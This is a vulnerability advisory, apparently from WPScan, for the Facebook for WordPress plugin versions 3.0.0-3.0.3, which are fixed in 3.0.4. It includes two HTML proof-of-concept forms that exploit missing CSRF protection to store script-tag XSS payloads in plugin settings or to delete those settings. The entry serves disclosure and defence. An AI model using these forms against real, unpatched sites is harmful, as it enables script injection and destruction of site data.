WordPress Plugin Vulnerabilities
Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion
Description
The wp_ajax_save_fbe_settings and wp_ajax_delete_fbe_settings AJAX actions of the plugin were vulnerable to CSRF due to a lack of nonce protection. The settings in the saveFbeSettings function had no sanitization allowing for script tags to be saved.
Proof of Concept
CSRF to XSS
<html>
<body>
<form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="save_fbe_settings" />
<input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
<input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
<input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF to Delete settings
<html>
<body>
<form action="[TARGETSITE]/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="delete_fbe_settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 3.0.4 References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-25 (about 3 years ago)
Added
2021-03-25 (about 3 years ago)
Last Updated
2021-03-27 (about 3 years ago)
WPScan 